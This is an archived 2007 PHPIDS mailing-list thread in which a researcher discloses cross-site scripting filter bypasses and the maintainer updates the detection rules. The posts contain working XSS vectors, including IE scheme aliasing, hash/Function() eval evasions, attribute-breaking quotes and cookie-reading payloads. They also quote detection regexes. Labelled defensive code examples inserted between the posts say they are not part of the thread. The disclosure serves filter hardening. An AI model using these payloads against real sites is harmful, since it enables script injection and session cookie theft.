About new XSS vectors and some PHP-IDS filters

SirDarckCat

Jul 2, 2007, 3:52:54 AM
to PHPIDS » Web Application Security 2.0, h...@ckers.org, 0x00...@trashmail.net
XSS Vectors:

There are some characteristics in Internet Explorer that could aid
attackers when doing XSS attacks.

In IExplorer:
??script:
and
???script:
are translated to vbscript:
so, for example:
MYscript:msgbox("hi")
or
YOUscript:msgbox("hi")
will be treated as:
vbscript:msgbox("hi")
and anything with:
????script:
will be treated as:
javascript:
so..
somescript:alert("hi");
will be treated as:
javascript:alert("hi");

About PHPIDS:

The following expression is not filtered:

document.location.search.substr(1)

document.location.search returns the variables sent as GET content.

The website:
http://site.com/?something here

document.location.search returns "something here"

There is no filter for document.referrer:
document.referrer.substr(32)

So for example, I could make a website:
http://www.attacker.com/red.php?code-here()

that redirects to the vulnerable site and the program would execute
"code-here()".

!!! --- The filter doesn't make any validation for VBScript. --- !!!

About the rule:
rule: (?:(?:location)?[. ]*hash[. ]*(?:substr(?:ing)?|replace)\s?\()
rule-description: detects self contained xss payload attacks
impact: 4

Ways of avoiding that rule:

document.location.hash.split(document.location.hash.charAt(0)).join()
document.location.hash[String().substr.toString().substr(9,6)](1)

About the rule:
rule: (?:(?:alert|prompt|confirm|dialog|expression|urn|fromCharcode|
decodeURIComponent...
rule-description: detects possible includes and typical script
methods
impact: 5

Ways of avoiding that rule:
window[eval.toString().substr(9,4)](--code_here--)
Function(--code_here--)();

Use of both vulnerabilities, for example:


Function(document.location.hash[String().substr.toString().substr(9,6)]
(1))();

Could lead to running the code inside http://site.com/#code-here


:)
Greetz!!

Att.
sirdarckcat

.mario

Jul 2, 2007, 4:00:57 AM
to PHPIDS » Web Application Security 2.0
Hi!

Welcome to the group and thanks a lot! I will review the suggestions
immediately and upgrade the filter rules. (Wow - I didn't know about
the ???script issue!)

Greetings,
.mario

> Could lead to running the code inside http://site.com/#code-here
>
> :)
> Greetz!!
>
> Att.
> sirdarckcat

.mario

Jul 2, 2007, 4:37:03 AM
to PHPIDS » Web Application Security 2.0
Hi!

Ok - after having stopped shivering I customized the rules and
deployed them to the smoketest. Thanks for the awesome input - very
much appreciated!

Greetings,
.mario

SirDarckCat

Jul 2, 2007, 7:08:16 PM
to PHPIDS » Web Application Security 2.0, h...@ckers.org
Hi!

Thanks for the welcome :)

there is another flaw in php-ids filters, this string:

x' y" z" awesome"whatever='something'

will allow me to put anything inside any attribute:

If you see the generated DOM code (in firefox), you can see that:

<a href="x' y" z" awesome"whatever='something'">
and
<a href='x' y" z" awesome"whatever='something''>
and
<a href=x' y" z" awesome"whatever='something'>

will be translated to:

double quoted:
<a href="?test=x%27%20y" z="" awesome="" whatever="something">

single quoted:
<a href="?test=x" y="" z="" awesome="" whatever="something">

no quotes:
<a href="?test=x%27" y="" z="" awesome="" whatever="something">

the important part is:
whatever="something"

I can't put onclick, nor onmousemove, etc., but I think that using
style could lead to exploitation... I'm not really sure.
anyway, if the affected zone instead of being an <a href were <img, I
think I could exploit it successfully.

This may be useful for rsnake's XSS cheat list.

Greetz!!
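The attribute-breaking string from the post, rendered by a naive template and by one that escapes for attribute context. This is an added example, not code from the thread or from PHPIDS; the template, the escaper and the quote-counting check are assumptions of the example.

```javascript
// Added example, not from the thread: the attribute-breaking string from the
// post rendered unsafely and safely. Template and check are mine, not PHPIDS.

const ATTRIBUTE_PAYLOAD = `x' y" z" awesome"whatever='something'`;

// Vulnerable: user input dropped straight into a double-quoted attribute.
function renderLinkUnsafe(value) {
  return `<a href="?test=${value}">`;
}

// Escape the five characters that matter in attribute context. For an href
// query parameter encodeURIComponent() is the more precise choice; this
// escaper is the general fix for any attribute value.
function escapeAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function renderLinkSafe(value) {
  return `<a href="?test=${escapeAttr(value)}">`;
}

// Quick regression check: the template writes exactly two double quotes;
// any extra ones mean the input closed the attribute value early and the
// browser will parse what follows as new attributes.
function rawDoubleQuotes(tag) {
  return (tag.match(/"/g) || []).length;
}
```

With the escaped form the browser sees one attribute, href, whose value happens to contain quote entities; the `whatever='something'` fragment never becomes an attribute of its own.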

SirDarckCat

Jul 2, 2007, 10:01:33 PM
to PHPIDS » Web Application Security 2.0
Hi, one more thing.

the use of "with" is not filtered:

with(document)location.href=cookie;

Greetz!!

.mario

Jul 3, 2007, 4:55:19 AM
to PHPIDS » Web Application Security 2.0
Hi!

Thanks again for your great work - it's a great benefit for the group
to have you aboard!

I just fixed the filter rules and uploaded them for the demo. As far
as I can see they now cover all problems appearing in the slackers
forum and this thread.

x' y" z" awesome"onerror='alert(1)' is now triggering an impact of 13
which i find suitable.

Also the patterns foo(bar), foo["bar"], foo().bar(), and new Function
foo("bar") are now covered - I hope that does it for now ;)

Also I tried to fix the with() issue more effectively, although this
rule needs more work.

Greetings!
.mario

SirDarckCat

Jul 3, 2007, 9:41:08 AM
to PHPIDS » Web Application Security 2.0
Hello

I'm having a lot of fun with these filters :P, it's the best challenge
I've seen in a long time.

There is another flaw; this one is an error in the handling of new
lines.

for example:

for each(screw
in window)try{screw(code
)}catch(rock_and_roll){1}

After a lot of alerts and confirms, the function "eval" will be
reached, and it will execute the code inside the variable code.

The variable code may be input like this:

var code = "";            // start from an empty string, not undefined
code += "alert";
code += "\
(";                       // backslash-newline continues the string literal
code += "document";
code += ".";
code += "cookie";
code += " \
); 123456 ";


Greetz!!
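A small "concatenation converter" of the kind the newline and `with` posts above call for, as an added example that is not code from the thread or from PHPIDS. It joins backslash-newline continuations, folds `name += "..."` statements into one string per variable, and then runs two rules over the result. The method rule is a subset of the one quoted earlier in the thread (the original is longer and truncated on the page); the `with(...)` rule is my own guess at what such a rule could look like, not PHPIDS's. The sample payload is the one from the post, with the `+=` typo fixed.

```javascript
// Added example, not from the thread or PHPIDS: normalise split-string
// payloads before matching, then scan with simplified stand-in rules.

// Constructed sample: the post's split-string payload (backslash-newline
// inside string literals, one fragment per statement).
const SPLIT_PAYLOAD = [
  'var code = "";',
  'code += "alert";',
  'code += "\\',
  '(";',
  'code += "document";',
  'code += ".";',
  'code += "cookie";',
  'code += " \\',
  '); 123456 ";',
].join("\n");

// Step 1: a backslash followed by a newline inside a JS string literal is a
// line continuation; remove it so each statement sits on one line.
function joinContinuations(src) {
  return src.replace(/\\\r?\n/g, "");
}

// Step 2: fold `name = "lit";` and `name += "lit";` statements into one
// string per variable, in source order.
function foldConcatenation(src) {
  const out = {};
  const stmt = /(\w+)\s*(=|\+=)\s*"((?:[^"\\]|\\.)*)"\s*;?/g;
  let m;
  while ((m = stmt.exec(src)) !== null) {
    const [, name, op, lit] = m;
    out[name] = (op === "=" ? "" : (out[name] || "")) + lit;
  }
  return out;
}

// Subset of the "typical script methods" rule quoted in the thread.
const methodRule =
  /(?:alert|prompt|confirm|dialog|expression|fromCharCode|decodeURIComponent)\s*\(/i;
// Assumed rule for the with(document)... trick; not the PHPIDS expression.
const withRule = /\bwith\s*\(\s*(?:document|window|location|self)\b/i;

function scan(text) {
  const hits = [];
  if (methodRule.test(text)) hits.push("method");
  if (withRule.test(text)) hits.push("with");
  return hits;
}

// Matching the raw input: what a line-oriented filter sees.
function scanRaw(src) {
  return scan(src);
}

// Matching after normalisation: rules see both the joined source and the
// reassembled string values, so "alert" + "(" becomes "alert(".
function scanNormalized(src) {
  const joined = joinContinuations(src);
  const folded = Object.values(foldConcatenation(joined)).join("\n");
  return scan(joined + "\n" + folded);
}
```

The folding step is deliberately dumb (string literals and `+=` only); anything computed at runtime, as in the earlier posts, still gets past it, which is the limit of any converter of this kind.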

.mario

Jul 3, 2007, 6:09:52 PM
to PHPIDS » Web Application Security 2.0
Hi!

"I'm having a lot of fun with these filters :P, it's the best challenge
I've seen in a long time"

Nice to hear - thanks!

Again very high quality and esoteric stuff! The for each() construct
is now being detected, but the concatenation gives me a headache... What
do you guys think - would it be useful to create a concatenation
converter?

Greetings,
.mario
